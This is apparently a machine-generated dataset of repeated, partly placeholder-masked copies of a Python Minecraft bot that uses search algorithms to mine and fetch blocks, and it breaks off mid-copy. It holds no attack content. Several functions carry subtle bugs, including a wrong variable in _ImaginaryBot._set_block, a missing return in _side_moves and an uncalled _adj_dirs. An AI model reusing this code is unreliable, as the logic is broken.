FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n <docstring token>\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n <docstring token>\n <function token>\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is 